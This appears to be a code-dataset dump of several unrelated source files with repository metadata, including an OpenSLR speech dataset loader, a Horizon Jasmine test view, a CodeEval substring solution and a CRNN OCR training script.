"SLR42": {
"Language": "Khmer",
"LongName": "High quality TTS data for Khmer",
"Category": "Speech",
"Summary": "Multi-speaker TTS data for Khmer (km-KH)",
"Files": ["km_kh_male.zip"],
"IndexFiles": ["km_kh_male/line_index.tsv"],
"DataDirs": ["km_kh_male/wavs"],
},
"SLR43": {
"Language": "Nepali",
"LongName": "High quality TTS data for Nepali",
"Category": "Speech",
"Summary": "Multi-speaker TTS data for Nepali (ne-NP)",
"Files": ["ne_np_female.zip"],
"IndexFiles": ["ne_np_female/line_index.tsv"],
"DataDirs": ["ne_np_female/wavs"],
},
"SLR44": {
"Language": "Sundanese",
"LongName": "High quality TTS data for Sundanese",
"Category": "Speech",
"Summary": "Multi-speaker TTS data for Javanese Sundanese (su-ID)",
"Files": ["su_id_female.zip", "su_id_male.zip"],
"IndexFiles": ["su_id_female/line_index.tsv", "su_id_male/line_index.tsv"],
"DataDirs": ["su_id_female/wavs", "su_id_male/wavs"],
},
"SLR63": {
"Language": "Malayalam",
"LongName": "Crowdsourced high-quality Malayalam multi-speaker speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of native speakers of Malayalam",
"Files": ["ml_in_female.zip", "ml_in_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR64": {
"Language": "Marathi",
"LongName": "Crowdsourced high-quality Marathi multi-speaker speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of native speakers of Marathi",
"Files": ["mr_in_female.zip"],
"IndexFiles": ["line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR65": {
"Language": "Tamil",
"LongName": "Crowdsourced high-quality Tamil multi-speaker speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of native speakers of Tamil",
"Files": ["ta_in_female.zip", "ta_in_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR66": {
"Language": "Telugu",
"LongName": "Crowdsourced high-quality Telugu multi-speaker speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of native speakers of Telugu",
"Files": ["te_in_female.zip", "te_in_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR69": {
"Language": "Catalan",
"LongName": "Crowdsourced high-quality Catalan speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Catalan",
"Files": ["ca_es_female.zip", "ca_es_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR70": {
"Language": "Nigerian English",
"LongName": "Crowdsourced high-quality Nigerian English speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Nigerian English",
"Files": ["en_ng_female.zip", "en_ng_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR71": {
"Language": "Chilean Spanish",
"LongName": "Crowdsourced high-quality Chilean Spanish speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Chilean Spanish",
"Files": ["es_cl_female.zip", "es_cl_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR72": {
"Language": "Columbian Spanish",
"LongName": "Crowdsourced high-quality Columbian Spanish speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Columbian Spanish",
"Files": ["es_co_female.zip", "es_co_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR73": {
"Language": "Peruvian Spanish",
"LongName": "Crowdsourced high-quality Peruvian Spanish speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Peruvian Spanish",
"Files": ["es_pe_female.zip", "es_pe_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR74": {
"Language": "Puerto Rico Spanish",
"LongName": "Crowdsourced high-quality Puerto Rico Spanish speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Puerto Rico Spanish",
"Files": ["es_pr_female.zip"],
"IndexFiles": ["line_index.tsv"],
"DataDirs": [""],
},
"SLR75": {
"Language": "Venezuelan Spanish",
"LongName": "Crowdsourced high-quality Venezuelan Spanish speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Venezuelan Spanish",
"Files": ["es_ve_female.zip", "es_ve_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR76": {
"Language": "Basque",
"LongName": "Crowdsourced high-quality Basque speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Basque",
"Files": ["eu_es_female.zip", "eu_es_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR77": {
"Language": "Galician",
"LongName": "Crowdsourced high-quality Galician speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Galician",
"Files": ["gl_es_female.zip", "gl_es_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR78": {
"Language": "Gujarati",
"LongName": "Crowdsourced high-quality Gujarati multi-speaker speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of native speakers of Gujarati",
"Files": ["gu_in_female.zip", "gu_in_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR79": {
"Language": "Kannada",
"LongName": "Crowdsourced high-quality Kannada multi-speaker speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of native speakers of Kannada",
"Files": ["kn_in_female.zip", "kn_in_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR80": {
"Language": "Burmese",
"LongName": "Crowdsourced high-quality Burmese speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Burmese",
"Files": ["my_mm_female.zip"],
"IndexFiles": ["line_index.tsv"],
"DataDirs": [""],
},
"SLR86": {
"Language": "Yoruba",
"LongName": "Crowdsourced high-quality Yoruba speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Yoruba",
"Files": ["yo_ng_female.zip", "yo_ng_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
}
class OpenSlrConfig(datasets.BuilderConfig):
def __init__(self, name, **kwargs):
self.language = kwargs.pop("language", None)
self.long_name = kwargs.pop("long_name", None)
self.category = kwargs.pop("category", None)
self.summary = kwargs.pop("summary", None)
self.files = kwargs.pop("files", None)
self.index_files = kwargs.pop("index_files", None)
self.data_dirs = kwargs.pop("data_dirs", None)
description = f"Open Speech and Language Resources dataset in {self.language}. Name: {self.name}, Summary: {self.summary}."
super(OpenSlrConfig, self).__init__(name=name, description=description, **kwargs)
class OpenSlr(datasets.GeneratorBasedBuilder):
BUILDER_CONFIGS = [
OpenSlrConfig(
name=resource_id,
language=_RESOURCES[resource_id]["Language"],
long_name=_RESOURCES[resource_id]["LongName"],
category=_RESOURCES[resource_id]["Category"],
summary=_RESOURCES[resource_id]["Summary"],
files=_RESOURCES[resource_id]["Files"],
index_files=_RESOURCES[resource_id]["IndexFiles"],
data_dirs=_RESOURCES[resource_id]["DataDirs"],
)
for resource_id in _RESOURCES.keys()
]
def _info(self):
features = datasets.Features(
{
"path": datasets.Value("string"),
"sentence": datasets.Value("string"),
}
)
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=features,
supervised_keys=None,
homepage=_HOMEPAGE,
license=_LICENSE,
citation=_CITATION,
)
def _split_generators(self, dl_manager):
resource_number = self.config.name.replace("SLR", "")
urls = [f"{_DATA_URL.format(resource_number)}/{file}" for file in self.config.files]
dl_paths = dl_manager.download_and_extract(urls)
abs_path_to_indexs = [os.path.join(path, f"{self.config.index_files[i]}") for i, path in enumerate(dl_paths)]
abs_path_to_datas = [os.path.join(path, f"{self.config.data_dirs[i]}") for i, path in enumerate(dl_paths)]
return [
datasets.SplitGenerator(
name=datasets.Split.TRAIN,
gen_kwargs={
"path_to_indexs": abs_path_to_indexs,
"path_to_datas": abs_path_to_datas,
},
),
]
def _generate_examples(self, path_to_indexs, path_to_datas):
counter = -1
if self.config.name in ["SLR35", "SLR36"]:
sentence_index = {}
for i, path_to_index in enumerate(path_to_indexs):
with open(path_to_index, encoding="utf-8") as f:
lines = f.readlines()
for id_, line in enumerate(lines):
field_values = re.split(r"\t\t?", line.strip())
filename, user_id, sentence = field_values
sentence_index[filename] = sentence
for path_to_data in sorted(Path(path_to_datas[i]).rglob("*.flac")):
filename = path_to_data.stem
if path_to_data.stem not in sentence_index:
continue
path = str(path_to_data.resolve())
sentence = sentence_index[filename]
counter += 1
yield counter, {"path": path, "sentence": sentence}
else:
for i, path_to_index in enumerate(path_to_indexs):
with open(path_to_index, encoding="utf-8") as f:
lines = f.readlines()
for id_, line in enumerate(lines):
# Following regexs are needed to normalise the lines, since the datasets
# are not always consistent and have bugs:
line = re.sub(r"\t[^\t]*\t", "\t", line.strip())
field_values = re.split(r"\t\t?", line)
if len(field_values) != 2:
continue
filename, sentence = field_values
# set absolute path for audio file
path = os.path.join(path_to_datas[i], f"{filename}.wav")
counter += 1
yield counter, {"path": path, "sentence": sentence}
| true | true |
f72304d340d02f0fda30bcdf157dff94ff2f8baa | 1,752 | py | Python | openstack_dashboard/test/jasmine/jasmine.py | timpricecatalyst/horizon | 8279ae0ed464e62e1c91e78341342160f8a07172 | [
"Apache-2.0"
] | 930 | 2015-01-04T08:06:03.000Z | 2022-03-13T18:47:13.000Z | openstack_dashboard/test/jasmine/jasmine.py | timpricecatalyst/horizon | 8279ae0ed464e62e1c91e78341342160f8a07172 | [
"Apache-2.0"
] | 106 | 2019-01-18T03:06:55.000Z | 2019-11-29T05:06:18.000Z | openstack_dashboard/test/jasmine/jasmine.py | timpricecatalyst/horizon | 8279ae0ed464e62e1c91e78341342160f8a07172 | [
"Apache-2.0"
] | 1,040 | 2015-01-01T18:48:28.000Z | 2022-03-19T08:35:18.000Z | #
# (c) Copyright 2015 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import inspect
import sys
import django.shortcuts
import django.views.defaults
def dispatcher(request, test_name):
# import is included in this non-standard location to avoid
# problems importing mox. See bug/1288245
from openstack_dashboard.test.jasmine import jasmine_tests as tests
classes = inspect.getmembers(sys.modules[tests.__name__],
inspect.isclass)
if not test_name:
return django.shortcuts.render(
request,
"horizon/jasmine/index.html",
{'classes': (cls_name for cls_name, _ in classes)}
)
else:
for cls_name, cls in classes:
if cls_name == test_name:
template = cls.template_name
if not template:
template = "horizon/jasmine/jasmine.html"
return django.shortcuts.render(
request,
template,
{'specs': cls.specs, 'sources': cls.sources,
'externalTemplates': cls.externalTemplates})
return django.views.defaults.page_not_found(request)
| 34.352941 | 75 | 0.651256 |
import inspect
import sys
import django.shortcuts
import django.views.defaults
def dispatcher(request, test_name):
from openstack_dashboard.test.jasmine import jasmine_tests as tests
classes = inspect.getmembers(sys.modules[tests.__name__],
inspect.isclass)
if not test_name:
return django.shortcuts.render(
request,
"horizon/jasmine/index.html",
{'classes': (cls_name for cls_name, _ in classes)}
)
else:
for cls_name, cls in classes:
if cls_name == test_name:
template = cls.template_name
if not template:
template = "horizon/jasmine/jasmine.html"
return django.shortcuts.render(
request,
template,
{'specs': cls.specs, 'sources': cls.sources,
'externalTemplates': cls.externalTemplates})
return django.views.defaults.page_not_found(request)
| true | true |
f72305483ba8a7b4f1b3f45c3b34f1b39521c5dd | 478 | py | Python | codeEval/hard/repeated_substring.py | ferhatelmas/algo | a7149c7a605708bc01a5cd30bf5455644cefd04d | [
"WTFPL"
] | 25 | 2015-01-21T16:39:18.000Z | 2021-05-24T07:01:24.000Z | codeEval/hard/repeated_substring.py | ferhatelmas/algo | a7149c7a605708bc01a5cd30bf5455644cefd04d | [
"WTFPL"
] | 2 | 2020-09-30T19:39:36.000Z | 2020-10-01T17:15:16.000Z | codeEval/hard/repeated_substring.py | ferhatelmas/algo | a7149c7a605708bc01a5cd30bf5455644cefd04d | [
"WTFPL"
] | 15 | 2015-01-21T16:39:27.000Z | 2020-10-01T17:00:22.000Z | import sys, re
def get_repeated_substring(s):
l = len(s)
for i in xrange(l / 2, 0, -1):
for j in xrange(l - i + 1):
ss = s[j : j + i]
if not re.match("\s+", ss):
for k in xrange(i + j, l - i + 1):
if s[k : k + i] == ss:
return ss
return "NONE"
test_cases = open(sys.argv[1], "r")
for test in test_cases:
print get_repeated_substring(test.strip())
test_cases.close()
| 23.9 | 50 | 0.481172 | import sys, re
def get_repeated_substring(s):
l = len(s)
for i in xrange(l / 2, 0, -1):
for j in xrange(l - i + 1):
ss = s[j : j + i]
if not re.match("\s+", ss):
for k in xrange(i + j, l - i + 1):
if s[k : k + i] == ss:
return ss
return "NONE"
test_cases = open(sys.argv[1], "r")
for test in test_cases:
print get_repeated_substring(test.strip())
test_cases.close()
| false | true |
f72305c4b33988bbf84766ce64ecc1d5889f907b | 10,006 | py | Python | train/pytorch-train/crnn_main.py | yyong119/EE208-Teamproject | 4cfecbf83981d89a98e811fcc7eefa9134036c43 | [
"MIT"
] | null | null | null | train/pytorch-train/crnn_main.py | yyong119/EE208-Teamproject | 4cfecbf83981d89a98e811fcc7eefa9134036c43 | [
"MIT"
] | null | null | null | train/pytorch-train/crnn_main.py | yyong119/EE208-Teamproject | 4cfecbf83981d89a98e811fcc7eefa9134036c43 | [
"MIT"
] | 5 | 2018-06-25T10:48:56.000Z | 2021-01-12T06:12:38.000Z | # -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import random
import torch
import torch.backends.cudnn as cudnn
import torch.optim as optim
import torch.utils.data
from torch.autograd import Variable
import numpy as np
from warpctc_pytorch import CTCLoss
import os
import utils
import dataset
from keys import alphabet
#Alphabet = [e.encode('utf-8') for e in alphabet]
import models.crnn as crnn
#with open('../run/char.txt') as f:
# newChars = f.read().strip().decode('utf-8')
#alphabet += u''.join(list(set(newChars) - set(alphabet)))
parser = argparse.ArgumentParser()
parser.add_argument('--trainroot', help='path to dataset',default='../data/lmdb/train')
parser.add_argument('--valroot', help='path to dataset',default='../data/lmdb/val')
parser.add_argument('--workers', type=int, help='number of data loading workers', default=4)
parser.add_argument('--batchSize', type=int, default=128, help='input batch size')
parser.add_argument('--imgH', type=int, default=32, help='the height of the input image to network')
parser.add_argument('--imgW', type=int, default=256, help='the width of the input image to network')
parser.add_argument('--nh', type=int, default=256, help='size of the lstm hidden state')
parser.add_argument('--niter', type=int, default=1000000, help='number of epochs to train for')
parser.add_argument('--lr', type=float, default=0.005, help='learning rate for Critic, default=0.00005')
parser.add_argument('--beta1', type=float, default=0.5, help='beta1 for adam. default=0.5')
parser.add_argument('--cuda', action='store_true', help='enables cuda')
parser.add_argument('--ngpu', type=int, default=1, help='number of GPUs to use')
parser.add_argument('--crnn', help="path to crnn (to continue training)",default='../pretrain-models/netCRNN.pth')
#parser.add_argument('--crnn', help="path to crnn (to continue training)",default='')
parser.add_argument('--alphabet', default=alphabet)
parser.add_argument('--experiment', help='Where to store samples and models',default='./save_model')
parser.add_argument('--displayInterval', type=int, default=50, help='Interval to be displayed')
parser.add_argument('--n_test_disp', type=int, default=1000, help='Number of samples to display when test')
parser.add_argument('--valInterval', type=int, default=50, help='Interval to be displayed')
parser.add_argument('--saveInterval', type=int, default=1000, help='Interval to be displayed')
parser.add_argument('--adam', action='store_true', help='Whether to use adam (default is rmsprop)')
parser.add_argument('--adadelta', action='store_true', help='Whether to use adadelta (default is rmsprop)')
parser.add_argument('--keep_ratio', action='store_true', help='whether to keep ratio for image resize')
parser.add_argument('--random_sample', action='store_true', help='whether to sample the dataset with random sampler')
opt = parser.parse_args()
print(opt)
ifUnicode=True
if opt.experiment is None:
opt.experiment = 'expr'
os.system('mkdir {0}'.format(opt.experiment))
opt.manualSeed = random.randint(1, 10000) # fix seed
print("Random Seed: ", opt.manualSeed)
random.seed(opt.manualSeed)
np.random.seed(opt.manualSeed)
torch.manual_seed(opt.manualSeed)
cudnn.benchmark = True
if torch.cuda.is_available() and not opt.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
train_dataset = dataset.lmdbDataset(root=opt.trainroot)
assert train_dataset
if not opt.random_sample:
sampler = dataset.randomSequentialSampler(train_dataset, opt.batchSize)
else:
sampler = None
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=opt.batchSize,
shuffle=True, sampler=sampler,
num_workers=int(opt.workers),
collate_fn=dataset.alignCollate(imgH=opt.imgH, imgW=opt.imgW, keep_ratio=opt.keep_ratio))
test_dataset = dataset.lmdbDataset(
root=opt.valroot, transform=dataset.resizeNormalize((256, 32)))
ngpu = int(opt.ngpu)
nh = int(opt.nh)
alphabet = opt.alphabet
nclass = len(alphabet) + 1
nc = 1
converter = utils.strLabelConverter(alphabet)
criterion = CTCLoss()
# custom weights initialization called on crnn
def weights_init(m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
m.weight.data.normal_(0.0, 0.02)
elif classname.find('BatchNorm') != -1:
m.weight.data.normal_(1.0, 0.02)
m.bias.data.fill_(0)
crnn = crnn.CRNN(opt.imgH, nc, nclass, nh, ngpu)
crnn.apply(weights_init)
if opt.crnn != '':
print('loading pretrained model from %s' % opt.crnn)
crnn.load_state_dict(torch.load(opt.crnn))
print(crnn)
image = torch.FloatTensor(opt.batchSize, 3, opt.imgH, opt.imgH)
text = torch.IntTensor(opt.batchSize * 5)
length = torch.IntTensor(opt.batchSize)
if opt.cuda:
crnn.cuda()
image = image.cuda()
criterion = criterion.cuda()
image = Variable(image)
text = Variable(text)
length = Variable(length)
# loss averager
loss_avg = utils.averager()
# setup optimizer
if opt.adam:
optimizer = optim.Adam(crnn.parameters(), lr=opt.lr,
betas=(opt.beta1, 0.999))
elif opt.adadelta:
optimizer = optim.Adadelta(crnn.parameters(), lr=opt.lr)
else:
optimizer = optim.RMSprop(crnn.parameters(), lr=opt.lr)
def val(net, dataset, criterion, max_iter=2):
print('Start val')
for p in crnn.parameters():
p.requires_grad = False
net.eval()
data_loader = torch.utils.data.DataLoader(
dataset, shuffle=True, batch_size=opt.batchSize, num_workers=int(opt.workers))
val_iter = iter(data_loader)
i = 0
n_correct = 0
loss_avg = utils.averager()
max_iter = min(max_iter, len(data_loader))
for i in range(max_iter):
data = val_iter.next()
i += 1
cpu_images, cpu_texts = data
batch_size = cpu_images.size(0)
utils.loadData(image, cpu_images)
if ifUnicode:
cpu_texts = [ clean_txt(tx.decode('utf-8')) for tx in cpu_texts]
t, l = converter.encode(cpu_texts)
utils.loadData(text, t)
utils.loadData(length, l)
preds = crnn(image)
preds_size = Variable(torch.IntTensor([preds.size(0)] * batch_size))
cost = criterion(preds, text, preds_size, length) / batch_size
loss_avg.add(cost)
_, preds = preds.max(2)
preds = preds.squeeze(2)
preds = preds.transpose(1, 0).contiguous().view(-1)
sim_preds = converter.decode(preds.data, preds_size.data, raw=False)
for pred, target in zip(sim_preds, cpu_texts):
if pred.strip() == target.strip():
n_correct += 1
raw_preds = converter.decode(preds.data, preds_size.data, raw=True)[:opt.n_test_disp]
#for raw_pred, pred, gt in zip(raw_preds, sim_preds, cpu_texts):
#print((pred, gt))
#print
accuracy = n_correct / float(max_iter * opt.batchSize)
testLoss = loss_avg.val()
#print('Test loss: %f, accuray: %f' % (testLoss, accuracy))
return testLoss,accuracy
def clean_txt(txt):
"""
filter char where not in alphabet with ' '
"""
newTxt = u''
for t in txt:
if t in alphabet:
newTxt+=t
else:
newTxt+=u' '
return newTxt
def trainBatch(net, criterion, optimizer,flage=False):
data = train_iter.next()
cpu_images, cpu_texts = data##decode utf-8 to unicode
if ifUnicode:
cpu_texts = [ clean_txt(tx.decode('utf-8')) for tx in cpu_texts]
batch_size = cpu_images.size(0)
utils.loadData(image, cpu_images)
t, l = converter.encode(cpu_texts)
utils.loadData(text, t)
utils.loadData(length, l)
preds = crnn(image)
preds_size = Variable(torch.IntTensor([preds.size(0)] * batch_size))
cost = criterion(preds, text, preds_size, length) / batch_size
crnn.zero_grad()
cost.backward()
if flage:
lr = 0.0001
optimizer = optim.Adadelta(crnn.parameters(), lr=lr)
optimizer.step()
return cost
num =0
lasttestLoss = 10000
testLoss = 10000
import os
def delete(path):
"""
删除文件
"""
import os
import glob
paths = glob.glob(path+'/*.pth')
for p in paths:
os.remove(p)
numLoss = 0##判断训练参数是否下降
for epoch in range(opt.niter):
train_iter = iter(train_loader)
i = 0
while i < len(train_loader):
#print('The step{} ........\n'.format(i))
for p in crnn.parameters():
p.requires_grad = True
crnn.train()
#if numLoss>50:
# cost = trainBatch(crnn, criterion, optimizer,True)
# numLoss = 0
#else:
cost = trainBatch(crnn, criterion, optimizer)
loss_avg.add(cost)
i += 1
#if i % opt.displayInterval == 0:
# print('[%d/%d][%d/%d] Loss: %f' %
# (epoch, opt.niter, i, len(train_loader), loss_avg.val()))
# loss_avg.reset()
if i % opt.valInterval == 0:
testLoss,accuracy = val(crnn, test_dataset, criterion)
#print('Test loss: %f, accuray: %f' % (testLoss, accuracy))
print("epoch:{},step:{},Test loss:{},accuracy:{},train loss:{}".format(epoch,num,testLoss,accuracy,loss_avg.val()))
loss_avg.reset()
# do checkpointing
num +=1
#lasttestLoss = min(lasttestLoss,testLoss)
if lasttestLoss >testLoss:
print("The step {},last lost:{}, current: {},save model!".format(num,lasttestLoss,testLoss))
lasttestLoss = testLoss
#delete(opt.experiment)##删除历史模型
torch.save(crnn.state_dict(), '{}/netCRNN.pth'.format(opt.experiment))
numLoss = 0
else:
numLoss+=1
| 36.385455 | 128 | 0.646112 |
from __future__ import print_function
import argparse
import random
import torch
import torch.backends.cudnn as cudnn
import torch.optim as optim
import torch.utils.data
from torch.autograd import Variable
import numpy as np
from warpctc_pytorch import CTCLoss
import os
import utils
import dataset
from keys import alphabet
import models.crnn as crnn
parser = argparse.ArgumentParser()
parser.add_argument('--trainroot', help='path to dataset',default='../data/lmdb/train')
parser.add_argument('--valroot', help='path to dataset',default='../data/lmdb/val')
parser.add_argument('--workers', type=int, help='number of data loading workers', default=4)
parser.add_argument('--batchSize', type=int, default=128, help='input batch size')
parser.add_argument('--imgH', type=int, default=32, help='the height of the input image to network')
parser.add_argument('--imgW', type=int, default=256, help='the width of the input image to network')
parser.add_argument('--nh', type=int, default=256, help='size of the lstm hidden state')
parser.add_argument('--niter', type=int, default=1000000, help='number of epochs to train for')
parser.add_argument('--lr', type=float, default=0.005, help='learning rate for Critic, default=0.00005')
parser.add_argument('--beta1', type=float, default=0.5, help='beta1 for adam. default=0.5')
parser.add_argument('--cuda', action='store_true', help='enables cuda')
parser.add_argument('--ngpu', type=int, default=1, help='number of GPUs to use')
parser.add_argument('--crnn', help="path to crnn (to continue training)",default='../pretrain-models/netCRNN.pth')
parser.add_argument('--alphabet', default=alphabet)
parser.add_argument('--experiment', help='Where to store samples and models',default='./save_model')
parser.add_argument('--displayInterval', type=int, default=50, help='Interval to be displayed')
parser.add_argument('--n_test_disp', type=int, default=1000, help='Number of samples to display when test')
parser.add_argument('--valInterval', type=int, default=50, help='Interval to be displayed')
parser.add_argument('--saveInterval', type=int, default=1000, help='Interval to be displayed')
parser.add_argument('--adam', action='store_true', help='Whether to use adam (default is rmsprop)')
parser.add_argument('--adadelta', action='store_true', help='Whether to use adadelta (default is rmsprop)')
parser.add_argument('--keep_ratio', action='store_true', help='whether to keep ratio for image resize')
parser.add_argument('--random_sample', action='store_true', help='whether to sample the dataset with random sampler')
opt = parser.parse_args()
print(opt)
ifUnicode=True
if opt.experiment is None:
opt.experiment = 'expr'
os.system('mkdir {0}'.format(opt.experiment))
opt.manualSeed = random.randint(1, 10000)
print("Random Seed: ", opt.manualSeed)
random.seed(opt.manualSeed)
np.random.seed(opt.manualSeed)
torch.manual_seed(opt.manualSeed)
cudnn.benchmark = True
if torch.cuda.is_available() and not opt.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
train_dataset = dataset.lmdbDataset(root=opt.trainroot)
assert train_dataset
if not opt.random_sample:
sampler = dataset.randomSequentialSampler(train_dataset, opt.batchSize)
else:
sampler = None
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=opt.batchSize,
shuffle=True, sampler=sampler,
num_workers=int(opt.workers),
collate_fn=dataset.alignCollate(imgH=opt.imgH, imgW=opt.imgW, keep_ratio=opt.keep_ratio))
test_dataset = dataset.lmdbDataset(
root=opt.valroot, transform=dataset.resizeNormalize((256, 32)))
ngpu = int(opt.ngpu)
nh = int(opt.nh)
alphabet = opt.alphabet
nclass = len(alphabet) + 1
nc = 1
converter = utils.strLabelConverter(alphabet)
criterion = CTCLoss()
def weights_init(m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
m.weight.data.normal_(0.0, 0.02)
elif classname.find('BatchNorm') != -1:
m.weight.data.normal_(1.0, 0.02)
m.bias.data.fill_(0)
crnn = crnn.CRNN(opt.imgH, nc, nclass, nh, ngpu)
crnn.apply(weights_init)
if opt.crnn != '':
print('loading pretrained model from %s' % opt.crnn)
crnn.load_state_dict(torch.load(opt.crnn))
print(crnn)
image = torch.FloatTensor(opt.batchSize, 3, opt.imgH, opt.imgH)
text = torch.IntTensor(opt.batchSize * 5)
length = torch.IntTensor(opt.batchSize)
if opt.cuda:
crnn.cuda()
image = image.cuda()
criterion = criterion.cuda()
image = Variable(image)
text = Variable(text)
length = Variable(length)
loss_avg = utils.averager()
if opt.adam:
optimizer = optim.Adam(crnn.parameters(), lr=opt.lr,
betas=(opt.beta1, 0.999))
elif opt.adadelta:
optimizer = optim.Adadelta(crnn.parameters(), lr=opt.lr)
else:
optimizer = optim.RMSprop(crnn.parameters(), lr=opt.lr)
def val(net, dataset, criterion, max_iter=2):
print('Start val')
for p in crnn.parameters():
p.requires_grad = False
net.eval()
data_loader = torch.utils.data.DataLoader(
dataset, shuffle=True, batch_size=opt.batchSize, num_workers=int(opt.workers))
val_iter = iter(data_loader)
i = 0
n_correct = 0
loss_avg = utils.averager()
max_iter = min(max_iter, len(data_loader))
for i in range(max_iter):
data = val_iter.next()
i += 1
cpu_images, cpu_texts = data
batch_size = cpu_images.size(0)
utils.loadData(image, cpu_images)
if ifUnicode:
cpu_texts = [ clean_txt(tx.decode('utf-8')) for tx in cpu_texts]
t, l = converter.encode(cpu_texts)
utils.loadData(text, t)
utils.loadData(length, l)
preds = crnn(image)
preds_size = Variable(torch.IntTensor([preds.size(0)] * batch_size))
cost = criterion(preds, text, preds_size, length) / batch_size
loss_avg.add(cost)
_, preds = preds.max(2)
preds = preds.squeeze(2)
preds = preds.transpose(1, 0).contiguous().view(-1)
sim_preds = converter.decode(preds.data, preds_size.data, raw=False)
for pred, target in zip(sim_preds, cpu_texts):
if pred.strip() == target.strip():
n_correct += 1
raw_preds = converter.decode(preds.data, preds_size.data, raw=True)[:opt.n_test_disp]
accuracy = n_correct / float(max_iter * opt.batchSize)
testLoss = loss_avg.val()
return testLoss,accuracy
def clean_txt(txt):
newTxt = u''
for t in txt:
if t in alphabet:
newTxt+=t
else:
newTxt+=u' '
return newTxt
def trainBatch(net, criterion, optimizer,flage=False):
data = train_iter.next()
cpu_images, cpu_texts = data cpu_texts = [ clean_txt(tx.decode('utf-8')) for tx in cpu_texts]
batch_size = cpu_images.size(0)
utils.loadData(image, cpu_images)
t, l = converter.encode(cpu_texts)
utils.loadData(text, t)
utils.loadData(length, l)
preds = crnn(image)
preds_size = Variable(torch.IntTensor([preds.size(0)] * batch_size))
cost = criterion(preds, text, preds_size, length) / batch_size
crnn.zero_grad()
cost.backward()
if flage:
lr = 0.0001
optimizer = optim.Adadelta(crnn.parameters(), lr=lr)
optimizer.step()
return cost
num =0
lasttestLoss = 10000
testLoss = 10000
import os
def delete(path):
import os
import glob
paths = glob.glob(path+'/*.pth')
for p in paths:
os.remove(p)
numLoss = 0 in range(opt.niter):
train_iter = iter(train_loader)
i = 0
while i < len(train_loader):
for p in crnn.parameters():
p.requires_grad = True
crnn.train()
cost = trainBatch(crnn, criterion, optimizer)
loss_avg.add(cost)
i += 1
if i % opt.valInterval == 0:
testLoss,accuracy = val(crnn, test_dataset, criterion)
print("epoch:{},step:{},Test loss:{},accuracy:{},train loss:{}".format(epoch,num,testLoss,accuracy,loss_avg.val()))
loss_avg.reset()
num +=1
if lasttestLoss >testLoss:
print("The step {},last lost:{}, current: {},save model!".format(num,lasttestLoss,testLoss))
lasttestLoss = testLoss
ch.save(crnn.state_dict(), '{}/netCRNN.pth'.format(opt.experiment))
numLoss = 0
else:
numLoss+=1
| true | true |
f72306b88c537cc8bdfae44f211f93ef1cbe9d3a | 475 | py | Python | vedadet/misc/bbox/assigners/__init__.py | jie311/vedadet | aaf3b3bc3c7944aba1cc28138165d403023a9152 | [
"Apache-2.0"
] | 549 | 2020-01-02T05:14:57.000Z | 2022-03-29T18:34:12.000Z | vedadet/misc/bbox/assigners/__init__.py | jie311/vedadet | aaf3b3bc3c7944aba1cc28138165d403023a9152 | [
"Apache-2.0"
] | 98 | 2020-01-21T09:41:30.000Z | 2022-03-12T00:53:06.000Z | vedadet/misc/bbox/assigners/__init__.py | jie311/vedadet | aaf3b3bc3c7944aba1cc28138165d403023a9152 | [
"Apache-2.0"
] | 233 | 2020-01-18T03:46:27.000Z | 2022-03-19T03:17:47.000Z | from .approx_max_iou_assigner import ApproxMaxIoUAssigner
from .assign_result import AssignResult
